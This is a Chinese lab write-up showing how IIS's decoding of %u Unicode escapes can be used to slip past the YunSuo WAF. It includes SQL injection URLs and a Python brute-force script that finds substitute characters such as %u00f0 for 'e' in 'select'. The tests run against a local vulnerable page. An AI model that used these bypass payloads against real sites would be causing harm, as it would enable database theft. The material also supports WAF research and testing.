一个有意思的通用windows防火墙bypass(云锁为例)--select中e的字母能否被-u的其

previous page next page

2:IIS在对%u0011形式的内容的时候,是可以解析的,例如url为:

code 区域 
      http://192.168.15.130/letmetest.asp?t=152522098 and(select top 1  eventname_en from eventshelp)>0

将url编码为:

code 区域 
      
        http://192.168.15.130/letmetest.asp?t=152522098 and(s
        %u0065
        lect top 1  eventname_en from eventshelp)>0

s%u0065lect的形式的时候也会被iis解析为select
3:于是先在本地搭建了一个云锁的环境,iis版本,本机使用了windows2003的环境,并且创建了一个有漏洞的页面http://192.168.15.130/letmetest.asp
4:先用以上方式去访问 %u0065的方式,此时发现云锁此种情况过滤了.
5:这里应该%uxxxx可以填写65535次个字符,会不会有不同国家的编码select对应解析出来成为ascii的select
6:代码:

code 区域 
      import httplib

import re


url = '192.168.15.130'

payload = '/letmetest.asp?t=152522098/**/%u00aand(s%u'


for i in range(65536):

    result = hex(i).replace('0x','')

    if len(result)<4:

        c = 4-len(result)

        b = '0'*c

        zz = b + hex(i).replace('0x','')

    else:

        zz = hex(i).replace('0x','')

    test = '%slect/**/count(*)/**/from/**/eventshelp)>0' % zz

    conn = httplib.HTTPConnection(url)

    try:

        conn.request('GET',payload+test)    

	res  = conn.getresponse().read()


	if re.search('Acunetix',res):

            print 'test char:char(%s)' % zz

    except:

        pass

就是测试select中e的字母能否被%u的其他字符替代

7:测试结果:

字符%u00f0被当成e字符了,输入s%u00f0lect 被iis解析滞后成了select,这样绕过了云锁的防御。

8:使用%u0065访问,直接被云锁干掉了

9:使用%u0095访问,直接报错注入,出来内容了

图片中的and中的a,也用同样的方式处理了。

10:IIS的新UNICODE漏洞WideChar和MultiByte字符转换问题

code 区域 
      http://blog.sina.com.cn/s/blog_85e506df0102vo9s.html


11: 传入的是widechar,widechar iis可以处理,会被转换。这里转换的时候会出现一个问题。

code 区域 
      多个widechar会有可能转换为同一个字符。


12:测试发现有些字符是会出现的,有些就不会出现多个转换成一个的情况,但是对于检测来说,往往只需要一个字符,即可达到绕过规则的目的。

previous page start next page